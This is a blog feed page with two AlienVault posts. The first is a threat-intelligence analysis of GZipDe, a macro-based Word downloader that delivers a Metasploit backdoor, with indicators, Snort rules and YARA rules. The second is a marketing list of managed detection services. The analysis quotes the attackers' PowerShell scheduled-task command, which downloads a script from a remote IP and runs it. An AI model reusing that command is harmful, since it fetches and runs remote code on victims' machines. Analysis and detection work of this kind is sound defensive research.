AlienVault Blogs

Syndicate content
The most recent posts from across the AlienVault blogs.
Updated: 54 min 33 sec ago

GZipDe: An Encrypted Downloader Serving Metasploit

Wed, 2018/06/20 - 18:44
At the end of May a Middle Eastern news network published an article about the next Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the area. It uses a piece of text taken from the report as a decoy: This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection. Malicious Document The file, which was uploaded to VirusTotal by a user in Afghanistan, contains macro malware embedded in a MS Office Word document (.doc).  When opened, it executes a Visual Basic script stored as a hexadecimal stream, and executes a new task in a hidden Powershell console: 'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F Leveraging an HTTP request, it resolves to the following URL: http://118.193.251[.]137/dropbox/?p=BT67HU78HZ We are missing the next step of the infection chain as the server is now offline. Based on the common path we believe this file is related, and may be part of the later infection steps: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe. GZipDe - The Encrypted Downloader The internal name of this malware is Gzipde, as specified by the path it was built on the attacker’s machine: \Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb We found the original reverse-tcp payload publicly available on GitHub, although the attacker added an additional layer of encryption payload to that version. It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection. The key is described as an array of bytes, with the values: After decompression, it passes through a decryptor. The encryption method used is RC4 with a key length of 23 bytes. The malware allocates a new memory page with execute, read and write privileges. Then it copies the contents of the decrypted payload and launches a new thread to execute it. The script uses WaitForSingleObject C# class, meaning that the program accesses a mutex object. A special handler controls the access of the process to system resources. This prevents multiple instances of the same malware to run at a time, unnecessarily increasing resource  usage and producing more network noise. The payload contains shellcode that contacts the server at 175.194.42[.]8. Whilst the server isn’t up, Shodan recorded it serving a Metasploit payload: Metasploit is becoming a popular choice with targeted attacks. The Metasploit payload The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload - a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands. This shellcode loads the entire DLL into memory, so it’s able to operate while writing no information into the disk. This operation is called Reflective DLL injection. From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network. Thanks to Chris Doman and Jaime Blasco for collaboration. Appendix File-Hashes
  IP Addresses 118.193.251[.]137 175.194.42[.]8 URLs http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe http://118.193.251[.]137/dropbox/?p=BT67HU78HZ Network Detection Multi-purpose: AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo) ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate Dedicated: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"^/\/dropbox\/\?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;) alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;) Unified Security Management (USM) Correlation Rules
  • System Compromise - Code Execution - Powershell Process Created by Office Word
  • Delivery & Attack - Suspicious Download - File Download via Office Macro
  • Environmental Awareness - Code Execution - Suspicious PowerShell Arguments
OTX Pulse Yara Rule rule gzipde_hunt { meta: author = "AlienVault Labs" description = "Hunt rule to identify files related to Gzipde" copyright = "Alienvault Inc. 2018" reference = "" strings: $a = "" nocase wide ascii $b = "BT67HU78HZ" nocase wide ascii $c = "2E0EB747-BE46-441A-A8B1-97AB27B49EC5" nocase wide ascii $d = "gzipde.pdb" nocase wide ascii $e = "C:\\Users\\jhon\\Documents\\Visual Studio 2008" nocase wide ascii condition: any of them } import "dotnet" rule MeterpreterEncryptedPayloadDotNetGzipDE { meta: type = "malware" description = "GZipDe" author = "" reference1 = "" reference2= "" strings: $pdb = "gzipde.pdb" $st1 = "PAGE_EXECUTE_READWRITE" $st2 = "EncryptInitalize" $st3 = "EncryptOutput" $st4 = "CreateThread" $st5 = "VirtualAlloc" condition: uint16(0) == 0x5A4D and ((dotnet.typelib == "c1181bc0-0102-44e9-82ba-7c1ca7d24219" and dotnet.guids[0] == "2e0eb747-be46-441a-a8b1-97ab27b49ec5") or $pdb or (dotnet.number_of_modulerefs == 1 and dotnet.modulerefs[0] == "kernel32" and all of ($st*))) }
Categories: Security Posts

10 Opportunities for MSPs and MSSPs to Deliver MDR Services

Wed, 2018/06/20 - 15:00
The proliferation of cybersecurity attacks and greater adoption of cloud applications and services is proving that traditional, prevention-only approaches are ineffective. Instead, organizations are focusing more on a detection and response strategy to manage their cybersecurity risk. However, staying up to date with the latest cybersecurity risks, managing multiple point security products, and finding skilled security resources is proving too challenging for many organizations that are instead looking to invest in Managed Detection and Response (MDR) services from their service providers, including MSPs and MSSPs. For service providers, the MDR trend creates an opportunity to stay competitive and add value that helps clients defend and respond to cyber threats. Here are 10 opportunities to embrace and deliver competitive MDR services:
  1. Provide 24-hour monitoring: Most organizations today are online and continuously connected, but many do not have the resources to monitor their IT security across all hours of every day. Offering round-the-clock monitoring takes the burden off resource constrained organizations, and helps reduce their cybersecurity risk both during and outside of regular business hours.
  2. Monitor cloud environments and applications: Many organizations are considering, or have already begun, the drive towards deploying infrastructure in the cloud or even using cloud applications for workloads like e-mail, collaboration, CRM, payroll, identity, and more. However, traditional security tools and existing expertise lack the capability and know-how of monitoring these environments, creating an increasing opportunity for service providers to help organizations on their respective journeys to the cloud.
  3. Identify the attack surface with asset discovery: The assets deployed across an organization’s environment represents the surface against which a malicious entity will conduct one or more attacks. That in mind, a common challenge for IT and security teams—both in terms of managing cost and cybersecurity risk—is keeping track of what assets are deployed and where. Particularly with the ease and speed in which new virtual machines can be created on virtualized and cloud environments, keeping track of any changes is critical. Service providers can solve this problem for clients by including asset discovery in their MDR services, providing awareness and visibility into all assets on-premises and in the cloud.
  4. Perform vulnerability scanning: Finding and addressing vulnerabilities is critical because they are often exploited to deliver zero-day threats and ransomware, and it’s no surprise to see regular vulnerability scanning a requirement for compliance with many regulations. Once you know where all assets are in the environment, the next logical step is to assess them for vulnerabilities which, given that an average of 14 vulnerabilities are discovered each month, needs to be performed regularly. While some customers may wish to patch systems on their own, service providers can also offer vulnerability remediation, namely the application of available patches, as an additional service. 
  5. Provide log management: Identifying risks and attacks requires analyzing events and logs, and being able to determine the root cause of an attack typically requires piecing together events from across multiple systems. The manual approach of collecting logs from individual systems is resource intensive, and that’s assuming the device still has the logs for the desired timeframe. Service providers can offer a better way with log management, automating the collection of events and logs into a central location, normalizing the log data for easier analysis and investigation, and storage of the data for at least one year to help customers satisfy any regulatory or standards-based log retention requirements (e.g. for PCI DSS), and for security best practice. 
  6. Offer advanced intrusion detection and security analysis: These will facilitate the rapid detection of threats across customers’ on-premises and cloud environments and applications. Host IDS and file integrity monitoring (FIM), network IDS, and cloud IDS can all offer quick warning of attacks and unauthorized activities. Additionally, advanced correlation—including the use of machine learning and behavioral monitoring—can accurately identify threats that may not be clearly apparent to traditional defenses
  7. Provide threat intelligence and context: To get the latest cyber threat indicators and context, some organizations opt to do their own research and analyze threat intelligence on their own, and some choose to acquire threat intelligence from a 3rd party. Both of these approaches often prove too expensive for many organizations, both in up-front cost and time, and especially considering that some have to procure multiple commercial threat intelligence feeds to meet their needs. Service providers who offer threat intelligence as part of their portfolio will have a distinct advantage, being able to be proactive against new threats, and have the right context on threats so that they can deliver optimal protection, response, and quickly show their customers that they are knowledgeable of the who, what, why and when questions that surround cyber threats.
  8. Deliver incident validation and response: Once an incident has been detected, the first step is to validate whether it is an actual threat or just noise, which often requires advanced knowledge and experience. The next step is delivering relevant information about each threat—what it is, its strategy and method, its origin and target, the threat actor, and the recommended response. While some organizations may wish to respond on their own, there is an accelerating trend for service providers to contain and/or fully remediate incidents, as well as perform post-incident forensics to identify the root cause.
  9. Deliver backup and recovery capabilities: The simplest form of business continuity, but one that is often poorly implemented across many organizations, is backup and recovery. This provides opportunity for service providers to deliver verified backup, along with the option to fully or partially recover systems and data, in the event of an outage or loss such as from a ransomware attack. Service providers can choose to offer additional business continuity services, such as the provision of warm and hot sites, as additional differentiators.
  10. Provide security consultation: Organizations often invest in disparate protection tools that don’t always work together, that require expertise they lack, or that may not be adequate for the environments they are trying to protect. This is exacerbated by the lack of skilled talent on the market, and new challenges such as protecting cloud and mobile assets. Service providers can address this space by offering consulting services to guide customers on understanding their environment, identify where there are risks, and helping develop and implement a cybersecurity management plan. In addition, service providers can offer training services, such as how customers can recognize phishing attacks, and how to respond if they discover them.
To accelerate your managed security services with AlienVault Unified Security Management, visit 
Categories: Security Posts